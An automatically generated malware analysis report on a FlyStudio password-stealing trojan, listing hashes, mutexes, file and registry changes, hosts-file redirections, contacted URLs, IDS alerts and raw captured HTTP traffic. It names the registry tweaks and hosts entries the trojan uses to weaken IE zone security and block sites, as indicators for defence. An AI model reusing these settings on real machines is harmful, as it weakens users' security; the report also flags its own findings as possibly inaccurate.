Trojan.Win32.FlyStudio_a517430713

by malwarelabrobot on July 7th, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Symmi.29067 (B) (Emsisoft), Gen:Variant.Symmi.34745 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericInjector.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: a517430713bac6f46043f06dc6af18b3
SHA1: 2892a9269d7e37e19f8047e03b39bb71f338885c
SHA256: 20891c390f9f41c441621656a349fa9bcde3228f8a12bd908c71f57e1f6085c6
SSDeep: 98304:D/wRWkbdA2UvLH8mRWQpMLio0GoTqvswLd EaMxWz2nJOz8:zwskbddUvLH8mRbo0pTK1B Eaiy2Qz8
Size: 4304896 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Rightapp software
Created at: 2014-06-06 05:24:44
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1368

Mutexes

The following mutexes were created/opened:

_!SHMSFTHISTORY!_
c:!documents and settings!adm!local settings!history!history.ie5!mshist012014070620140707!
oleacc-msaa-loaded
CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:1368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\btn_del[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pb_v.min.1.9[1].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj.v.5.2[2].js (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1.6.min[1].js (5296 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (187 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\logo_index[1].png (1797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\fav[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3F.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@soso[2].txt (330 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (304 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\link[1].jpg (1190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\link[1].jpg (2870 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\40.tmp (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\year[1].jsp (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\year[1].jsp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\button_10[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\qunb[1].htm (258 bytes)
%System%\drivers\etc\hosts (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (606 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@soso[1].txt (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj.v.5.2[1].js (1785 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\soso[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ico_icp[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\soso[1] (600 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\icon_index[1].png (440 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\q[1].htm (5797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\group[1].png (1 bytes)
C:\¾¢ÎèЦЦ-Ψһ¹ÙÍø.url (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ico_src[1].png (2623 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pb_v.min.1.9[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\q[1].se&unc=&query=¾¢ÎèЦЦ (5370 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\41.tmp (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1.6.min[2].js (5776 bytes)
C:\ʹÓñؿ´.txt (4 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (6748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\logo130826[1].png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\soso[1].htm (383 bytes)
C:\VIPЦЦ-¹ºÂòÁ´½Ó.url (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\qq[1].htm (229 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\year[1].jsp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1.6.min[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pb_v.min.1.9[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\soso[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418 (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3F.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@soso[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj.v.5.2[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sugg_ajaj_soso.v.1.0[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\41.tmp (0 bytes)

Registry activity

The process %original file name%.exe:1368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014070620140707]
"CacheRepair" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014070620140707]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014070620140707\"
"CacheOptions" = "11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014070620140707]
"CachePrefix" = ":2014070620140707:"
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 3C E8 E6 4C 79 99 F9 C5 67 52 BE C7 56 B1 3E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041720130418]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 1206 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 52jwyy.com
127.0.0.1 www.52jwyy.com
127.0.0.1 bbs.52jwyy.com
127.0.0.1 au2014.com
127.0.0.1 www.au2014.com
127.0.0.1 92ausf.com
127.0.0.1 www.92ausf.com
127.0.0.1 92jwyy.taobao.com
127.0.0.1 shop105942574.taobao.com
127.0.0.1 jwyywg.d131.tqxq.com
127.0.0.1 www.jwyywg.d131.tqxq.com
127.0.0.1 audition0538.i.sohu.com
127.0.0.1 www.vdisk.cn/au2012fuzhu
127.0.0.1 audition0538.blog.sohu.com
127.0.0.1 9421mm.com
127.0.0.1 www.9421mm.com


Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: WWW.52JWXX.COM
Product Name: ?????????
Product Version: 8.1.0.0
Legal Copyright: WWW.52JWXX.COM ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 8.1.0.0
File Description: ?????????
Comments: 
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 876526 876544 5.08395 9a47888722edf8f101707893074b64f5
.rdata 880640 3245706 3248128 4.90476 b471263b00118fa525b1471915027624
.data 4128768 268202 65536 4.24412 9fe63150746bcf82ffe894d0c222ac43
.rsrc 4399104 106712 110592 2.53173 6f559eb786d8f8a7c4c8fae97c3b23c0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://b.proxy.sogou.com/
hxxp://blogx.sina.com.cn/s/blog_b61e00f001016mtd.html
hxxp://b.proxy.sogou.com/soso/images/logo_index.png
hxxp://ctc.a.proxy.sogou.com/websearch/features/year.jsp
hxxp://b.proxy.sogou.com/soso/images/icon_index.png
hxxp://wpa.qq.com/pa?p=2:1848168177:41 &r=0.6772223338484764 112.90.83.87
hxxp://b.proxy.sogou.com/js/sugg_ajaj_soso.v.1.0.js
hxxp://ssd.tcdn.qq.com/qconn/wpa/button/button_10.gif
hxxp://ssd.tcdn.qq.com/wpa/images/group.png
hxxp://b.proxy.sogou.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ
hxxp://b.proxy.sogou.com/images/btn_del.gif
hxxp://proxy.sogou.com/net/a/04/link?&url=http://p4.yokacdn.com/pic/cr/2011/0909/10256772.jpg&appid=100520072&referer=hxxp://www.yokamen.cn/auto/news/2013/0604089097.shtml
hxxp://b.proxy.sogou.com/images/ico_src.png
hxxp://b.proxy.sogou.com/images/logo/new/soso.png?nv=1&v=2
hxxp://06811.xdwscache.glb0.lxdns.com/30d/img/web/logo130826.png
hxxp://b.proxy.sogou.com/js/jquery-1.6.min.js
hxxp://b.proxy.sogou.com/images/ico_icp.gif
hxxp://ctc.a.proxy.sogou.com/img/fav.ico?6be69b4a-b962-42eb-8324-0d6d8e367010
hxxp://b.proxy.sogou.com/js/pb_v.min.1.9.js
hxxp://proxy.sogou.com/net/a/04/link?&url=http://www.pvc123.com/skin/pvc/image/company.jpg&appid=100520072&referer=hxxp://www.pvc123.com/b-p765576731/
hxxp://b.proxy.sogou.com/js/sugg_ajaj.v.5.2.js
hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=web&uigs_t=1404660989708240&uigs_cookie=SUID=26266BB86914920A0000000053B9B257&uigs_uuid=1404660989708379&scrnwi=1024&scrnhi=768&uigs_pbtag=A&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&rn=25687&stype=2&htn=1&qcn=0&hbn=0&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&exp_id=null_0-null_1-null_2-null_3-null_4-null_5-null_6-null_7-null_8-null_9&exp_id_list=0_0&exp_status=0&vrdetail=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&sm=d0_0-d0_1-d0_2-d0_3-d0_4-d0_5-d0_6-d0_7-d0_8-d0_9&msrc=sm&loc=CA&adn=0&adltbn=null&adltan=0&radn=0&qflag=0&qtype=0&warnLevel=127&leadtest=-1&eg=1&cost=116&bl=-1_127_0_0&pid=sogou-wsse-142c65e00f4f7cf2&qjf=sogou-wsse-142c65e00f4f7cf2&servuri=%2Fwebsearch%2Fsoso.jsp&rw=&idc=cnc&pn=10&jhhint=0&jhshuxing=0&intcat=web&inttab=61-0_40-1_28-2_41-3_39-4_43-5_9-6_29-7_30-8_45-9_62-10_&jhly=top&jhlysite=all-0_sohu.com-1_focus.cn-2_docin.com-3_&legalad=1&googlead=0&uigs_version=v1.1&uigs_refer=http://www.soso.com/
hxxp://ctc.ping.sogou.com/pv.gif?uigs_productid=webapp&type=tmon&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&loc=CA&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&eg=1&cost=116&idc=cnc&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&h_s=1404660985943&h_e=1404660986568&b_e=1404660988755&a_e=1404660990302&w_l=1404660990333
hxxp://www.soso.com/q?utf-8=ie&pid=s.idx&cid=s.idx.se&unc=&query=¾¢ÎèЦЦ 220.181.124.154
hxxp://img02.store.sogou.com/net/a/04/link?&url=http://www.pvc123.com/skin/pvc/image/company.jpg&appid=100520072&referer=hxxp://www.pvc123.com/b-p765576731/ 106.120.151.64
hxxp://pb.sogou.com/pv.gif?uigs_productid=webapp&type=tmon&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&loc=CA&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&eg=1&cost=116&idc=cnc&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&h_s=1404660985943&h_e=1404660986568&b_e=1404660988755&a_e=1404660990302&w_l=1404660990333 220.181.124.109
hxxp://www.soso.com/ 220.181.124.154
hxxp://www.soso.com/js/sugg_ajaj_soso.v.1.0.js 220.181.124.154
hxxp://www.soso.com/soso/images/icon_index.png 220.181.124.154
hxxp://www.sogou.com/websearch/features/year.jsp 218.30.103.111
hxxp://www.soso.com/images/ico_src.png 220.181.124.154
hxxp://www.sogou.com/img/fav.ico?6be69b4a-b962-42eb-8324-0d6d8e367010 218.30.103.111
hxxp://img04.store.sogou.com/net/a/04/link?&url=http://p4.yokacdn.com/pic/cr/2011/0909/10256772.jpg&appid=100520072&referer=hxxp://www.yokamen.cn/auto/news/2013/0604089097.shtml 220.181.124.3
hxxp://www.soso.com/js/jquery-1.6.min.js 220.181.124.154
hxxp://www.soso.com/js/sugg_ajaj.v.5.2.js 220.181.124.154
hxxp://www.soso.com/images/logo/new/soso.png?nv=1&v=2 220.181.124.154
hxxp://pub.idqqimg.com/qconn/wpa/button/button_10.gif 103.7.30.59
hxxp://www.soso.com/images/btn_del.gif 220.181.124.154
hxxp://soso.qstatic.com/30d/img/web/logo130826.png 8.37.231.19
hxxp://pub.idqqimg.com/wpa/images/group.png 103.7.30.59
hxxp://www.soso.com/js/pb_v.min.1.9.js 220.181.124.154
hxxp://www.soso.com/soso/images/logo_index.png 220.181.124.154
hxxp://blog.sina.com.cn/s/blog_b61e00f001016mtd.html 218.30.115.254
hxxp://www.soso.com/images/ico_icp.gif 220.181.124.154
hxxp://pb.sogou.com/pv.gif?uigs_productid=web&uigs_t=1404660989708240&uigs_cookie=SUID=26266BB86914920A0000000053B9B257&uigs_uuid=1404660989708379&scrnwi=1024&scrnhi=768&uigs_pbtag=A&abtestid=0&query=%C2%BE%C2%A2%C3%8E%C3%A8%C3%90%C2%A6%C3%90%C2%A6&rn=25687&stype=2&htn=1&qcn=0&hbn=0&uuid=6be69b4a-b962-42eb-8324-0d6d8e367010&vr=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&exp_id=null_0-null_1-null_2-null_3-null_4-null_5-null_6-null_7-null_8-null_9&exp_id_list=0_0&exp_status=0&vrdetail=null_0-null_1-null_2-30000909_3-30000909_4-null_5-null_6-null_7-null_8-null_9&sm=d0_0-d0_1-d0_2-d0_3-d0_4-d0_5-d0_6-d0_7-d0_8-d0_9&msrc=sm&loc=CA&adn=0&adltbn=null&adltan=0&radn=0&qflag=0&qtype=0&warnLevel=127&leadtest=-1&eg=1&cost=116&bl=-1_127_0_0&pid=sogou-wsse-142c65e00f4f7cf2&qjf=sogou-wsse-142c65e00f4f7cf2&servuri=%2Fwebsearch%2Fsoso.jsp&rw=&idc=cnc&pn=10&jhhint=0&jhshuxing=0&intcat=web&inttab=61-0_40-1_28-2_41-3_39-4_43-5_9-6_29-7_30-8_45-9_62-10_&jhly=top&jhlysite=all-0_sohu.com-1_focus.cn-2_docin.com-3_&legalad=1&googlead=0&uigs_version=v1.1&uigs_refer=http://www.soso.com/ 220.181.124.109
www.hookbug.com 183.60.204.213


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET DNS DNS Query for Suspicious .com.cn Domain
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:19:24 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:23 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUID=26266BB86914920A0000000053B9B257; expires=Sat, 01-Jul-34 20:32:23 GMT; domain=.soso.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sun, 06 Jul 2014 20:32:23 GMT
Cache-Control: max-age=0
Content-Encoding: gzip
b2a.............Y[o$G.~v....r.g....{.......F..dw.(.......=]..j...<.
..H!..D....)..M$. .$.&.....s..6..m.U}..;.N.......g/o_.......>....O.
Gj..o.<..s..H.....8..m.*.*..Q.)q.j@.?TMd..w....A....%M........n.../
n......s.i.....u..k[.#...T5.\.\...S|...L|...N...Y.&..Ds......AF\.#.%.V
.{=".x<...:...*I.H. .8h..AR`...D..e<n..F..9..<..]...1.}...S..
\...K.[.....4... c.B.a(C.......g(...q Bn,"7"..})...8.~..{~,..t.......k
..!Ql$..AX,.8..0.......N.J$.o.A..llvg...!.m|.....j._..{e,.[......../..
.\.QZ.P..FV..J.........Qm-.LS......... .....(s.#<.S.Y.I:.h..$...R..
C.Ad.'O$Q..!"..XN ..J.3.,*.............9R)9..... ..F....~9....d..,.k..
.D.m......'..N..F...V)(......!.nUrQ.....a...$%".....,.(>.v..Nv.....
...^n....d)........D..#.....v.K.Cm..3O..0.|..s.ge.Yhbz.T 2U....%......
.......Yy& r|..e.V2b..\...A.z..u....Y.sTx.pAIV.e.]..i....LdS..........
aG._.o..G.)S..1.k..1RV......B...2r.8A.#).. ....6Z%.Z.Z[......._le.`...
d4.G..VR.K... Fw,.(.A.....}....g.ny.>.|g...C..&k*[email protected]
.9:..x..... ..V........d....j.&..2Mxv&.x......z.Awr. \t1..!.N..5..#...
...p.,g.......C....j.....dj_......J.....D..9;....M[..Qp.....V......>
;....3M[..f...5.a..6*/..|:...?S.y=.....e..S....}..Z......*...F...N.p..
.."...8..7..:.G/[..3.7.0.SY3.".$#C.g.`..........N"Z]...$.u..P..m..o.%=
......$..3]..L.]..<...F.f.8..;...~.1..=}.Kcq.jK.R...~....k..;_.....
...f..Wn .=....H....r.t.|8.8.v..F...]9.../..w..,.nf....n.|......7..J?.
........5.P..O~}./.?..q....e...............W:wV'.3.&<....ej.mn..\Cn
.~p.^.......0.. b..0.....-%.......o.|.8A..$)c......,.........>.
<<< skipped >>>

GET /soso/images/logo_index.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.soso.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.soso.com
Connection: Keep-Alive
Cookie: SUID=26266BB86914920A0000000053B9B257


HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Jul 2014 20:32:23 GMT
Content-Type: image/png
Content-Length: 5020
Connection: keep-alive
Last-Modified: Wed, 18 Jun 2014 15:19:23 GMT
Set-Cookie: IPLOC=CA; expires=Mon, 06-Jul-15 20:32:23 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
ETag: "53a1adfb-139c"
Expires: Tue, 05 Aug 2014 20:32:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR.......1.....6.F.....tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:BA474413854011E2AD099132
6E52ED8A" xmpMM:DocumentID="xmp.did:BA474414854011E2AD0991326E52ED8A"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BA474411854011E2AD
0991326E52ED8A" stRef:documentID="xmp.did:BA474412854011E2AD0991326E52
ED8A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>c..{....PLTE...{{|....... ,......QQSFFI....
.d.....n..2....tt...ggh:..K......OOZZ\...........w......B..E....0.....
...L.....4.22...........Z........3........2........R..W.........^....N
..............g...........]........PTTV]]_LLM..a........3.............
[email protected]......^`
b..........@?prsVVY.....i.........q..~.K..j..............ROOP.33.aa..=
......G....IDATx....C.....>(..h-.. ..y*..y.ik......A*..R.9.....>
.Iv..|........:3;.D....._Gy.I.\.......\..=.@ .....x@&..?..........._.5
